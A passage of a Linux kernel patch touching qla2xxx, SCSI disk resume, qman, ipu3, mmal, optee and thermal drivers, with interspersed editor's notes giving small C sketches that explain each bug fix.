+-					    "Unable to reinitialize FCE "
+-					    "(%d).\n", rval);
+-					ha->flags.fce_enabled = 0;
+-				}
+-			}
+ 
+-			if (ha->eft) {
+-				memset(ha->eft, 0, EFT_SIZE);
+-				rval = qla2x00_enable_eft_trace(vha,
+-				    ha->eft_dma, EFT_NUM_BUFFERS);
+-				if (rval) {
+-					ql_log(ql_log_warn, vha, 0x8034,
+-					    "Unable to reinitialize EFT "
+-					    "(%d).\n", rval);
+-				}
+-			}
+ 		} else {	/* failed the ISP abort */
+ 			vha->flags.online = 1;
+ 			if (test_bit(ISP_ABORT_RETRY, &vha->dpc_flags)) {
+@@ -7708,6 +7702,14 @@ qla2x00_abort_isp(scsi_qla_host_t *vha)
+ 				atomic_inc(&vp->vref_count);
+ 				spin_unlock_irqrestore(&ha->vport_slock, flags);
+ 
++				/* User may have updated [fcp|nvme] prefer in flash */
++				list_for_each_entry(fcport, &vp->vp_fcports, list) {
++					if (NVME_PRIORITY(ha, fcport))
++						fcport->do_prli_nvme = 1;
++					else
++						fcport->do_prli_nvme = 0;
++				}
++
+ 				qla2x00_vp_abort_isp(vp);
+ 
+ 				spin_lock_irqsave(&ha->vport_slock, flags);
+diff --git a/drivers/scsi/qla2xxx/qla_iocb.c b/drivers/scsi/qla2xxx/qla_iocb.c
+index 9e524d52dc862..7bccd525ee19b 100644
+--- a/drivers/scsi/qla2xxx/qla_iocb.c
++++ b/drivers/scsi/qla2xxx/qla_iocb.c
+@@ -2588,6 +2588,33 @@ void
+ qla2x00_sp_release(struct kref *kref)
+ {
+ 	struct srb *sp = container_of(kref, struct srb, cmd_kref);
++	struct scsi_qla_host *vha = sp->vha;
++
++	switch (sp->type) {
++	case SRB_CT_PTHRU_CMD:
++		/* GPSC & GFPNID use fcport->ct_desc.ct_sns for both req & rsp */
++		if (sp->u.iocb_cmd.u.ctarg.req &&
++			(!sp->fcport ||
++			 sp->u.iocb_cmd.u.ctarg.req != sp->fcport->ct_desc.ct_sns)) {
++			dma_free_coherent(&vha->hw->pdev->dev,
++			    sp->u.iocb_cmd.u.ctarg.req_allocated_size,
++			    sp->u.iocb_cmd.u.ctarg.req,
++			    sp->u.iocb_cmd.u.ctarg.req_dma);
++			sp->u.iocb_cmd.u.ctarg.req = NULL;
++		}
++		if (sp->u.iocb_cmd.u.ctarg.rsp &&
++			(!sp->fcport ||
++			 sp->u.iocb_cmd.u.ctarg.rsp != sp->fcport->ct_desc.ct_sns)) {
++			dma_free_coherent(&vha->hw->pdev->dev,
++			    sp->u.iocb_cmd.u.ctarg.rsp_allocated_size,
++			    sp->u.iocb_cmd.u.ctarg.rsp,
++			    sp->u.iocb_cmd.u.ctarg.rsp_dma);
++			sp->u.iocb_cmd.u.ctarg.rsp = NULL;
++		}
++		break;
++	default:
++		break;
++	}
+ 
+ 	sp->free(sp);
+ }
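
[Editor's note] The new SRB_CT_PTHRU_CMD case in qla2x00_sp_release() frees the request/response DMA buffers only when they are not the fcport's shared ct_desc.ct_sns area, which GPSC and GFPNID borrow for both directions per the comment. A minimal sketch of the pattern, freeing a per-command buffer only if it is not the shared default (all names are hypothetical):

#include <stdio.h>
#include <stdlib.h>

static char shared_buf[64];	/* long-lived buffer owned elsewhere */

struct cmd {
	char *req;	/* either shared_buf or a private allocation */
};

static void cmd_release(struct cmd *c)
{
	/* Free only what this command privately owns. */
	if (c->req && c->req != shared_buf) {
		free(c->req);
		c->req = NULL;
	}
}

int main(void)
{
	struct cmd borrows = { shared_buf };
	struct cmd owns = { malloc(64) };

	cmd_release(&borrows);	/* no-op: the shared buffer survives */
	cmd_release(&owns);	/* the private buffer is freed */
	printf("released both commands\n");
	return 0;
}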
+@@ -2611,7 +2638,8 @@ static void qla2x00_els_dcmd_sp_free(srb_t *sp)
+ {
+ 	struct srb_iocb *elsio = &sp->u.iocb_cmd;
+ 
+-	kfree(sp->fcport);
++	if (sp->fcport)
++		qla2x00_free_fcport(sp->fcport);
+ 
+ 	if (elsio->u.els_logo.els_logo_pyld)
+ 		dma_free_coherent(&sp->vha->hw->pdev->dev, DMA_POOL_SIZE,
+@@ -2693,7 +2721,7 @@ qla24xx_els_dcmd_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 	 */
+ 	sp = qla2x00_get_sp(vha, fcport, GFP_KERNEL);
+ 	if (!sp) {
+-		kfree(fcport);
++		qla2x00_free_fcport(fcport);
+ 		ql_log(ql_log_info, vha, 0x70e6,
+ 		 "SRB allocation failed\n");
+ 		return -ENOMEM;
+@@ -2724,6 +2752,7 @@ qla24xx_els_dcmd_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 	if (!elsio->u.els_logo.els_logo_pyld) {
+ 		/* ref: INIT */
+ 		kref_put(&sp->cmd_kref, qla2x00_sp_release);
++		qla2x00_free_fcport(fcport);
+ 		return QLA_FUNCTION_FAILED;
+ 	}
+ 
+@@ -2748,6 +2777,7 @@ qla24xx_els_dcmd_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 	if (rval != QLA_SUCCESS) {
+ 		/* ref: INIT */
+ 		kref_put(&sp->cmd_kref, qla2x00_sp_release);
++		qla2x00_free_fcport(fcport);
+ 		return QLA_FUNCTION_FAILED;
+ 	}
+ 
+@@ -3013,7 +3043,7 @@ static void qla2x00_els_dcmd2_sp_done(srb_t *sp, int res)
+ 
+ int
+ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+-    fc_port_t *fcport, bool wait)
++			fc_port_t *fcport)
+ {
+ 	srb_t *sp;
+ 	struct srb_iocb *elsio = NULL;
+@@ -3028,8 +3058,7 @@ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 	if (!sp) {
+ 		ql_log(ql_log_info, vha, 0x70e6,
+ 		 "SRB allocation failed\n");
+-		fcport->flags &= ~FCF_ASYNC_ACTIVE;
+-		return -ENOMEM;
++		goto done;
+ 	}
+ 
+ 	fcport->flags |= FCF_ASYNC_SENT;
+@@ -3038,9 +3067,6 @@ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 	ql_dbg(ql_dbg_io, vha, 0x3073,
+ 	       "%s Enter: PLOGI portid=%06x\n", __func__, fcport->d_id.b24);
+ 
+-	if (wait)
+-		sp->flags = SRB_WAKEUP_ON_COMP;
+-
+ 	sp->type = SRB_ELS_DCMD;
+ 	sp->name = "ELS_DCMD";
+ 	sp->fcport = fcport;
+@@ -3056,7 +3082,7 @@ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 
+ 	if (!elsio->u.els_plogi.els_plogi_pyld) {
+ 		rval = QLA_FUNCTION_FAILED;
+-		goto out;
++		goto done_free_sp;
+ 	}
+ 
+ 	resp_ptr = elsio->u.els_plogi.els_resp_pyld =
+@@ -3065,7 +3091,7 @@ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 
+ 	if (!elsio->u.els_plogi.els_resp_pyld) {
+ 		rval = QLA_FUNCTION_FAILED;
+-		goto out;
++		goto done_free_sp;
+ 	}
+ 
+ 	ql_dbg(ql_dbg_io, vha, 0x3073, "PLOGI %p %p\n", ptr, resp_ptr);
+@@ -3080,7 +3106,6 @@ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 
+ 	if (els_opcode == ELS_DCMD_PLOGI && DBELL_ACTIVE(vha)) {
+ 		struct fc_els_flogi *p = ptr;
+-
+ 		p->fl_csp.sp_features |= cpu_to_be16(FC_SP_FT_SEC);
+ 	}
+ 
+@@ -3089,10 +3114,11 @@ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 	    (uint8_t *)elsio->u.els_plogi.els_plogi_pyld,
+ 	    sizeof(*elsio->u.els_plogi.els_plogi_pyld));
+ 
+-	init_completion(&elsio->u.els_plogi.comp);
+ 	rval = qla2x00_start_sp(sp);
+ 	if (rval != QLA_SUCCESS) {
+-		rval = QLA_FUNCTION_FAILED;
++		fcport->flags |= FCF_LOGIN_NEEDED;
++		set_bit(RELOGIN_NEEDED, &vha->dpc_flags);
++		goto done_free_sp;
+ 	} else {
+ 		ql_dbg(ql_dbg_disc, vha, 0x3074,
+ 		    "%s PLOGI sent, hdl=%x, loopid=%x, to port_id %06x from port_id %06x\n",
+@@ -3100,21 +3126,15 @@ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 		    fcport->d_id.b24, vha->d_id.b24);
+ 	}
+ 
+-	if (wait) {
+-		wait_for_completion(&elsio->u.els_plogi.comp);
+-
+-		if (elsio->u.els_plogi.comp_status != CS_COMPLETE)
+-			rval = QLA_FUNCTION_FAILED;
+-	} else {
+-		goto done;
+-	}
++	return rval;
+ 
+-out:
+-	fcport->flags &= ~(FCF_ASYNC_SENT | FCF_ASYNC_ACTIVE);
++done_free_sp:
+ 	qla2x00_els_dcmd2_free(vha, &elsio->u.els_plogi);
+ 	/* ref: INIT */
+ 	kref_put(&sp->cmd_kref, qla2x00_sp_release);
+ done:
++	fcport->flags &= ~(FCF_ASYNC_SENT | FCF_ASYNC_ACTIVE);
++	qla2x00_set_fcport_disc_state(fcport, DSC_DELETED);
+ 	return rval;
+ }
+ 
+@@ -3916,7 +3936,7 @@ qla2x00_start_sp(srb_t *sp)
+ 		return -EAGAIN;
+ 	}
+ 
+-	pkt = __qla2x00_alloc_iocbs(sp->qpair, sp);
++	pkt = qla2x00_alloc_iocbs_ready(sp->qpair, sp);
+ 	if (!pkt) {
+ 		rval = -EAGAIN;
+ 		ql_log(ql_log_warn, vha, 0x700c,
+diff --git a/drivers/scsi/qla2xxx/qla_mbx.c b/drivers/scsi/qla2xxx/qla_mbx.c
+index f794f4363a38c..1fd9485985f2e 100644
+--- a/drivers/scsi/qla2xxx/qla_mbx.c
++++ b/drivers/scsi/qla2xxx/qla_mbx.c
+@@ -194,7 +194,7 @@ qla2x00_mailbox_command(scsi_qla_host_t *vha, mbx_cmd_t *mcp)
+ 	if (ha->flags.purge_mbox || chip_reset != ha->chip_reset ||
+ 	    ha->flags.eeh_busy) {
+ 		ql_log(ql_log_warn, vha, 0xd035,
+-		       "Error detected: purge[%d] eeh[%d] cmd=0x%x, Exiting.\n",
++		       "Purge mbox: purge[%d] eeh[%d] cmd=0x%x, Exiting.\n",
+ 		       ha->flags.purge_mbox, ha->flags.eeh_busy, mcp->mb[0]);
+ 		rval = QLA_ABORTED;
+ 		goto premature_exit;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 25ca0544b9639..25d0c2bfdd742 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -5562,7 +5562,7 @@ qla2x00_do_work(struct scsi_qla_host *vha)
+ 			break;
+ 		case QLA_EVT_ELS_PLOGI:
+ 			qla24xx_els_dcmd2_iocb(vha, ELS_DCMD_PLOGI,
+-			    e->u.fcport.fcport, false);
++			    e->u.fcport.fcport);
+ 			break;
+ 		case QLA_EVT_SA_REPLACE:
+ 			rc = qla24xx_issue_sa_replace_iocb(vha, e);
+diff --git a/drivers/scsi/qla2xxx/qla_target.c b/drivers/scsi/qla2xxx/qla_target.c
+index 5a5beb41786ed..043cfa10c7167 100644
+--- a/drivers/scsi/qla2xxx/qla_target.c
++++ b/drivers/scsi/qla2xxx/qla_target.c
+@@ -1079,6 +1079,16 @@ void qlt_free_session_done(struct work_struct *work)
+ 		    "%s: sess %p logout completed\n", __func__, sess);
+ 	}
+ 
++	/* check for any straggling io left behind */
++	if (!(sess->flags & FCF_FCP2_DEVICE) &&
++	    qla2x00_eh_wait_for_pending_commands(sess->vha, sess->d_id.b24, 0, WAIT_TARGET)) {
++		ql_log(ql_log_warn, vha, 0x3027,
++		    "IO not return. Resetting.\n");
++		set_bit(ISP_ABORT_NEEDED, &vha->dpc_flags);
++		qla2xxx_wake_dpc(vha);
++		qla2x00_wait_for_chip_reset(vha);
++	}
++
+ 	if (sess->logo_ack_needed) {
+ 		sess->logo_ack_needed = 0;
+ 		qla24xx_async_notify_ack(vha, sess,
+diff --git a/drivers/scsi/scsi_scan.c b/drivers/scsi/scsi_scan.c
+index bab00b65bc9d1..852d509b19b2b 100644
+--- a/drivers/scsi/scsi_scan.c
++++ b/drivers/scsi/scsi_scan.c
+@@ -1611,6 +1611,40 @@ int scsi_add_device(struct Scsi_Host *host, uint channel,
+ }
+ EXPORT_SYMBOL(scsi_add_device);
+ 
++int scsi_resume_device(struct scsi_device *sdev)
++{
++	struct device *dev = &sdev->sdev_gendev;
++	int ret = 0;
++
++	device_lock(dev);
++
++	/*
++	 * Bail out if the device or its queue are not running. Otherwise,
++	 * the rescan may block waiting for commands to be executed, with us
++	 * holding the device lock. This can result in a potential deadlock
++	 * in the power management core code when system resume is on-going.
++	 */
++	if (sdev->sdev_state != SDEV_RUNNING ||
++	    blk_queue_pm_only(sdev->request_queue)) {
++		ret = -EWOULDBLOCK;
++		goto unlock;
++	}
++
++	if (dev->driver && try_module_get(dev->driver->owner)) {
++		struct scsi_driver *drv = to_scsi_driver(dev->driver);
++
++		if (drv->resume)
++			ret = drv->resume(dev);
++		module_put(dev->driver->owner);
++	}
++
++unlock:
++	device_unlock(dev);
++
++	return ret;
++}
++EXPORT_SYMBOL(scsi_resume_device);
++
+ int scsi_rescan_device(struct scsi_device *sdev)
+ {
+ 	struct device *dev = &sdev->sdev_gendev;
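
[Editor's note] The new scsi_resume_device() checks, while holding the device lock, that the device and its queue can make progress before it dispatches into the driver's resume callback; otherwise it bails out with -EWOULDBLOCK instead of blocking with the lock held while system resume is in flight. A minimal userspace sketch of that check-before-blocking shape (states and return codes are illustrative):

#include <errno.h>
#include <pthread.h>
#include <stdio.h>

enum state { RUNNING, QUIESCED };

struct dev {
	pthread_mutex_t lock;
	enum state state;
	int (*resume)(struct dev *);
};

static int do_resume(struct dev *d)
{
	int ret = 0;

	pthread_mutex_lock(&d->lock);
	/* Bail out before any potentially blocking work: the caller may
	 * already hold resources that the blocked work would need. */
	if (d->state != RUNNING) {
		ret = -EWOULDBLOCK;
		goto unlock;
	}
	if (d->resume)
		ret = d->resume(d);
unlock:
	pthread_mutex_unlock(&d->lock);
	return ret;
}

static int driver_resume(struct dev *d) { (void)d; return 0; }

int main(void)
{
	struct dev d = { PTHREAD_MUTEX_INITIALIZER, QUIESCED, driver_resume };

	printf("quiesced: %d\n", do_resume(&d));	/* -EWOULDBLOCK */
	d.state = RUNNING;
	printf("running: %d\n", do_resume(&d));		/* 0 */
	return 0;
}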
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index 4433b02c8935f..c793bca882236 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -110,6 +110,7 @@ static int sd_suspend_system(struct device *);
+ static int sd_suspend_runtime(struct device *);
+ static int sd_resume_system(struct device *);
+ static int sd_resume_runtime(struct device *);
++static int sd_resume(struct device *);
+ static void sd_rescan(struct device *);
+ static blk_status_t sd_init_command(struct scsi_cmnd *SCpnt);
+ static void sd_uninit_command(struct scsi_cmnd *SCpnt);
+@@ -691,6 +692,7 @@ static struct scsi_driver sd_template = {
+ 		.pm		= &sd_pm_ops,
+ 	},
+ 	.rescan			= sd_rescan,
++	.resume			= sd_resume,
+ 	.init_command		= sd_init_command,
+ 	.uninit_command		= sd_uninit_command,
+ 	.done			= sd_done,
+@@ -3830,7 +3832,22 @@ static int sd_suspend_runtime(struct device *dev)
+ 	return sd_suspend_common(dev, true);
+ }
+ 
+-static int sd_resume(struct device *dev, bool runtime)
++static int sd_resume(struct device *dev)
++{
++	struct scsi_disk *sdkp = dev_get_drvdata(dev);
++
++	if (sdkp->device->no_start_on_resume)
++		sd_printk(KERN_NOTICE, sdkp, "Starting disk\n");
++
++	if (opal_unlock_from_suspend(sdkp->opal_dev)) {
++		sd_printk(KERN_NOTICE, sdkp, "OPAL unlock failed\n");
++		return -EIO;
++	}
++
++	return 0;
++}
++
++static int sd_resume_common(struct device *dev, bool runtime)
+ {
+ 	struct scsi_disk *sdkp = dev_get_drvdata(dev);
+ 	int ret = 0;
+@@ -3849,7 +3866,7 @@ static int sd_resume(struct device *dev, bool runtime)
+ 	}
+ 
+ 	if (!ret) {
+-		opal_unlock_from_suspend(sdkp->opal_dev);
++		sd_resume(dev);
+ 		sdkp->suspended = false;
+ 	}
+ 
+@@ -3868,7 +3885,7 @@ static int sd_resume_system(struct device *dev)
+ 		return 0;
+ 	}
+ 
+-	return sd_resume(dev, false);
++	return sd_resume_common(dev, false);
+ }
+ 
+ static int sd_resume_runtime(struct device *dev)
+@@ -3892,7 +3909,7 @@ static int sd_resume_runtime(struct device *dev)
+ 				  "Failed to clear sense data\n");
+ 	}
+ 
+-	return sd_resume(dev, true);
++	return sd_resume_common(dev, true);
+ }
+ 
+ /**
+diff --git a/drivers/slimbus/core.c b/drivers/slimbus/core.c
+index 219483b79c09c..37fd655994ef3 100644
+--- a/drivers/slimbus/core.c
++++ b/drivers/slimbus/core.c
+@@ -436,8 +436,8 @@ static int slim_device_alloc_laddr(struct slim_device *sbdev,
+ 		if (ret < 0)
+ 			goto err;
+ 	} else if (report_present) {
+-		ret = ida_simple_get(&ctrl->laddr_ida,
+-				     0, SLIM_LA_MANAGER - 1, GFP_KERNEL);
++		ret = ida_alloc_max(&ctrl->laddr_ida,
++				    SLIM_LA_MANAGER - 1, GFP_KERNEL);
+ 		if (ret < 0)
+ 			goto err;
+ 
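
[Editor's note] ida_alloc_max(ida, max, gfp) hands out the smallest free ID in the inclusive range [0, max], which here keeps logical addresses strictly below the manager's reserved value. The behavior in a tiny sketch, with a linear scan standing in for the kernel's IDA (the bound is arbitrary):

#include <stdbool.h>
#include <stdio.h>

#define MAX_ID	6	/* inclusive upper bound, like ida_alloc_max()'s max */

static bool used[MAX_ID + 1];

static int id_alloc_max(void)
{
	for (int id = 0; id <= MAX_ID; id++) {
		if (!used[id]) {
			used[id] = true;
			return id;
		}
	}
	return -1;	/* the kernel returns -ENOSPC here */
}

int main(void)
{
	int a = id_alloc_max();
	int b = id_alloc_max();
	int c = id_alloc_max();

	printf("%d %d %d\n", a, b, c);	/* 0 1 2 */
	used[1] = false;		/* like ida_free(ida, 1) */
	printf("%d\n", id_alloc_max());	/* reuses the lowest free ID: 1 */
	return 0;
}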
+diff --git a/drivers/soc/fsl/qbman/qman.c b/drivers/soc/fsl/qbman/qman.c
+index 739e4eee6b75c..7e9074519ad22 100644
+--- a/drivers/soc/fsl/qbman/qman.c
++++ b/drivers/soc/fsl/qbman/qman.c
+@@ -991,7 +991,7 @@ struct qman_portal {
+ 	/* linked-list of CSCN handlers. */
+ 	struct list_head cgr_cbs;
+ 	/* list lock */
+-	spinlock_t cgr_lock;
++	raw_spinlock_t cgr_lock;
+ 	struct work_struct congestion_work;
+ 	struct work_struct mr_work;
+ 	char irqname[MAX_IRQNAME];
+@@ -1281,7 +1281,7 @@ static int qman_create_portal(struct qman_portal *portal,
+ 		/* if the given mask is NULL, assume all CGRs can be seen */
+ 		qman_cgrs_fill(&portal->cgrs[0]);
+ 	INIT_LIST_HEAD(&portal->cgr_cbs);
+-	spin_lock_init(&portal->cgr_lock);
++	raw_spin_lock_init(&portal->cgr_lock);
+ 	INIT_WORK(&portal->congestion_work, qm_congestion_task);
+ 	INIT_WORK(&portal->mr_work, qm_mr_process_task);
+ 	portal->bits = 0;
+@@ -1456,11 +1456,14 @@ static void qm_congestion_task(struct work_struct *work)
+ 	union qm_mc_result *mcr;
+ 	struct qman_cgr *cgr;
+ 
+-	spin_lock(&p->cgr_lock);
++	/*
++	 * FIXME: QM_MCR_TIMEOUT is 10ms, which is too long for a raw spinlock!
++	 */
++	raw_spin_lock_irq(&p->cgr_lock);
+ 	qm_mc_start(&p->p);
+ 	qm_mc_commit(&p->p, QM_MCC_VERB_QUERYCONGESTION);
+ 	if (!qm_mc_result_timeout(&p->p, &mcr)) {
+-		spin_unlock(&p->cgr_lock);
++		raw_spin_unlock_irq(&p->cgr_lock);
+ 		dev_crit(p->config->dev, "QUERYCONGESTION timeout\n");
+ 		qman_p_irqsource_add(p, QM_PIRQ_CSCI);
+ 		return;
+@@ -1476,7 +1479,7 @@ static void qm_congestion_task(struct work_struct *work)
+ 	list_for_each_entry(cgr, &p->cgr_cbs, node)
+ 		if (cgr->cb && qman_cgrs_get(&c, cgr->cgrid))
+ 			cgr->cb(p, cgr, qman_cgrs_get(&rr, cgr->cgrid));
+-	spin_unlock(&p->cgr_lock);
++	raw_spin_unlock_irq(&p->cgr_lock);
+ 	qman_p_irqsource_add(p, QM_PIRQ_CSCI);
+ }
+ 
+@@ -2440,7 +2443,7 @@ int qman_create_cgr(struct qman_cgr *cgr, u32 flags,
+ 	preempt_enable();
+ 
+ 	cgr->chan = p->config->channel;
+-	spin_lock(&p->cgr_lock);
++	raw_spin_lock_irq(&p->cgr_lock);
+ 
+ 	if (opts) {
+ 		struct qm_mcc_initcgr local_opts = *opts;
+@@ -2477,7 +2480,7 @@ int qman_create_cgr(struct qman_cgr *cgr, u32 flags,
+ 	    qman_cgrs_get(&p->cgrs[1], cgr->cgrid))
+ 		cgr->cb(p, cgr, 1);
+ out:
+-	spin_unlock(&p->cgr_lock);
++	raw_spin_unlock_irq(&p->cgr_lock);
+ 	put_affine_portal();
+ 	return ret;
+ }
+@@ -2512,7 +2515,7 @@ int qman_delete_cgr(struct qman_cgr *cgr)
+ 		return -EINVAL;
+ 
+ 	memset(&local_opts, 0, sizeof(struct qm_mcc_initcgr));
+-	spin_lock_irqsave(&p->cgr_lock, irqflags);
++	raw_spin_lock_irqsave(&p->cgr_lock, irqflags);
+ 	list_del(&cgr->node);
+ 	/*
+ 	 * If there are no other CGR objects for this CGRID in the list,
+@@ -2537,7 +2540,7 @@ int qman_delete_cgr(struct qman_cgr *cgr)
+ 		/* add back to the list */
+ 		list_add(&cgr->node, &p->cgr_cbs);
+ release_lock:
+-	spin_unlock_irqrestore(&p->cgr_lock, irqflags);
++	raw_spin_unlock_irqrestore(&p->cgr_lock, irqflags);
+ 	put_affine_portal();
+ 	return ret;
+ }
+@@ -2577,9 +2580,9 @@ static int qman_update_cgr(struct qman_cgr *cgr, struct qm_mcc_initcgr *opts)
+ 	if (!p)
+ 		return -EINVAL;
+ 
+-	spin_lock_irqsave(&p->cgr_lock, irqflags);
++	raw_spin_lock_irqsave(&p->cgr_lock, irqflags);
+ 	ret = qm_modify_cgr(cgr, 0, opts);
+-	spin_unlock_irqrestore(&p->cgr_lock, irqflags);
++	raw_spin_unlock_irqrestore(&p->cgr_lock, irqflags);
+ 	put_affine_portal();
+ 	return ret;
+ }
+diff --git a/drivers/staging/media/ipu3/ipu3-v4l2.c b/drivers/staging/media/ipu3/ipu3-v4l2.c
+index e530767e80a5d..55cc44a401bc4 100644
+--- a/drivers/staging/media/ipu3/ipu3-v4l2.c
++++ b/drivers/staging/media/ipu3/ipu3-v4l2.c
+@@ -1069,6 +1069,11 @@ static int imgu_v4l2_subdev_register(struct imgu_device *imgu,
+ 	struct imgu_media_pipe *imgu_pipe = &imgu->imgu_pipe[pipe];
+ 
+ 	/* Initialize subdev media entity */
++	imgu_sd->subdev.entity.ops = &imgu_media_ops;
++	for (i = 0; i < IMGU_NODE_NUM; i++) {
++		imgu_sd->subdev_pads[i].flags = imgu_pipe->nodes[i].output ?
++			MEDIA_PAD_FL_SINK : MEDIA_PAD_FL_SOURCE;
++	}
+ 	r = media_entity_pads_init(&imgu_sd->subdev.entity, IMGU_NODE_NUM,
+ 				   imgu_sd->subdev_pads);
+ 	if (r) {
+@@ -1076,11 +1081,6 @@ static int imgu_v4l2_subdev_register(struct imgu_device *imgu,
+ 			"failed initialize subdev media entity (%d)\n", r);
+ 		return r;
+ 	}
+-	imgu_sd->subdev.entity.ops = &imgu_media_ops;
+-	for (i = 0; i < IMGU_NODE_NUM; i++) {
+-		imgu_sd->subdev_pads[i].flags = imgu_pipe->nodes[i].output ?
+-			MEDIA_PAD_FL_SINK : MEDIA_PAD_FL_SOURCE;
+-	}
+ 
+ 	/* Initialize subdev */
+ 	v4l2_subdev_init(&imgu_sd->subdev, &imgu_subdev_ops);
+@@ -1177,15 +1177,15 @@ static int imgu_v4l2_node_setup(struct imgu_device *imgu, unsigned int pipe,
+ 	}
+ 
+ 	/* Initialize media entities */
++	node->vdev_pad.flags = node->output ?
++		MEDIA_PAD_FL_SOURCE : MEDIA_PAD_FL_SINK;
++	vdev->entity.ops = NULL;
+ 	r = media_entity_pads_init(&vdev->entity, 1, &node->vdev_pad);
+ 	if (r) {
+ 		dev_err(dev, "failed initialize media entity (%d)\n", r);
+ 		mutex_destroy(&node->lock);
+ 		return r;
+ 	}
+-	node->vdev_pad.flags = node->output ?
+-		MEDIA_PAD_FL_SOURCE : MEDIA_PAD_FL_SINK;
+-	vdev->entity.ops = NULL;
+ 
+ 	/* Initialize vbq */
+ 	vbq->type = node->vdev_fmt.type;
+diff --git a/drivers/staging/vc04_services/vchiq-mmal/mmal-vchiq.c b/drivers/staging/vc04_services/vchiq-mmal/mmal-vchiq.c
+index cb921c94996a1..90eb4c5936f38 100644
+--- a/drivers/staging/vc04_services/vchiq-mmal/mmal-vchiq.c
++++ b/drivers/staging/vc04_services/vchiq-mmal/mmal-vchiq.c
+@@ -938,8 +938,9 @@ static int create_component(struct vchiq_mmal_instance *instance,
+ 	/* build component create message */
+ 	m.h.type = MMAL_MSG_TYPE_COMPONENT_CREATE;
+ 	m.u.component_create.client_component = component->client_component;
+-	strncpy(m.u.component_create.name, name,
+-		sizeof(m.u.component_create.name));
++	strscpy_pad(m.u.component_create.name, name,
++		    sizeof(m.u.component_create.name));
++	m.u.component_create.pid = 0;
+ 
+ 	ret = send_synchronous_mmal_msg(instance, &m,
+ 					sizeof(m.u.component_create),
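
[Editor's note] strncpy() leaves the destination unterminated whenever the source fills the buffer, while strscpy_pad() both NUL-terminates and zero-fills the tail, so the message carries no stray or uninitialized bytes. A userspace sketch of the difference, with a tiny stand-in for strscpy_pad() since the kernel helper is not available outside the kernel:

#include <stdio.h>
#include <string.h>

/* Minimal stand-in for the kernel's strscpy_pad(): truncate if needed,
 * always terminate, zero-fill the remainder of the buffer. */
static void copy_pad(char *dst, const char *src, size_t size)
{
	size_t n = strlen(src);

	if (n >= size)
		n = size - 1;
	memset(dst, 0, size);
	memcpy(dst, src, n);
}

int main(void)
{
	char a[4], b[4];

	strncpy(a, "abcdef", sizeof(a));	/* a holds "abcd": NOT terminated */
	copy_pad(b, "abcdef", sizeof(b));	/* b holds "abc" plus NUL */

	printf("b=%s, a terminated: %s\n", b, a[3] == '\0' ? "yes" : "no");
	return 0;
}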
+diff --git a/drivers/tee/optee/device.c b/drivers/tee/optee/device.c
+index 4b10921276942..1892e49a8e6a6 100644
+--- a/drivers/tee/optee/device.c
++++ b/drivers/tee/optee/device.c
+@@ -90,13 +90,14 @@ static int optee_register_device(const uuid_t *device_uuid, u32 func)
+ 	if (rc) {
+ 		pr_err("device registration failed, err: %d\n", rc);
+ 		put_device(&optee_device->dev);
++		return rc;
+ 	}
+ 
+ 	if (func == PTA_CMD_GET_DEVICES_SUPP)
+ 		device_create_file(&optee_device->dev,
+ 				   &dev_attr_need_supplicant);
+ 
+-	return rc;
++	return 0;
+ }
+ 
+ static int __optee_enumerate_devices(u32 func)
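
[Editor's note] The optee hunk returns the error immediately after put_device(), so device_create_file() can no longer run on a device whose registration failed and whose last reference may already be gone. A minimal sketch of the bail-out-right-after-cleanup pattern (these names are hypothetical stand-ins, not the kernel API):

#include <stdio.h>

struct dev { int refs; };

static void dev_put(struct dev *d) { d->refs--; }

static int dev_register(struct dev *d, int fail)
{
	d->refs++;		/* registration took a reference */
	if (fail) {
		dev_put(d);	/* release it on error ... */
		return -1;	/* ... and stop: the object may be gone */
	}
	/* Only reached on success: safe to keep using d. */
	printf("registered, refs=%d\n", d->refs);
	return 0;
}

int main(void)
{
	struct dev d = { 1 };

	if (dev_register(&d, 1))
		printf("registration failed, refs=%d\n", d.refs);
	return 0;
}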
+diff --git a/drivers/thermal/devfreq_cooling.c b/drivers/thermal/devfreq_cooling.c
+index 24b474925cd68..0b424bc8cadfd 100644
+--- a/drivers/thermal/devfreq_cooling.c
++++ b/drivers/thermal/devfreq_cooling.c
+@@ -201,7 +201,7 @@ static int devfreq_cooling_get_requested_power(struct thermal_cooling_device *cd
+ 
+ 		res = dfc->power_ops->get_real_power(df, power, freq, voltage);
+ 		if (!res) {
+-			state = dfc->capped_state;
++			state = dfc->max_state - dfc->capped_state;
+ 
+ 			/* Convert EM power into milli-Watts first */
+ 			dfc->res_util = dfc->em_pd->table[state].power;
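
[Editor's note] The one-line fix inverts the index: cooling state 0 means no throttling (highest performance), while the energy-model table is ordered from lowest to highest performance, so the row to read for a capped state is max_state - capped_state. A small runnable sketch of the arithmetic (the power numbers are made up):

#include <stdio.h>

int main(void)
{
	/* Hypothetical EM table, ascending by performance (mW). */
	const unsigned int power[] = { 100, 250, 400, 700 };
	const unsigned int max_state = 3;	/* table size - 1 */

	for (unsigned int capped = 0; capped <= max_state; capped++) {
		unsigned int row = max_state - capped;

		printf("cooling state %u -> table row %u -> %u mW\n",
		       capped, row, power[row]);
	}
	return 0;
}

State 0 maps to the 700 mW row (full power) and the deepest state to the 100 mW row, which is what the requested-power calculation expects.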
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index 8efe31448df3c..c744feabd7cdd 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -1377,9 +1377,6 @@ static void autoconfig_irq(struct uart_8250_port *up)
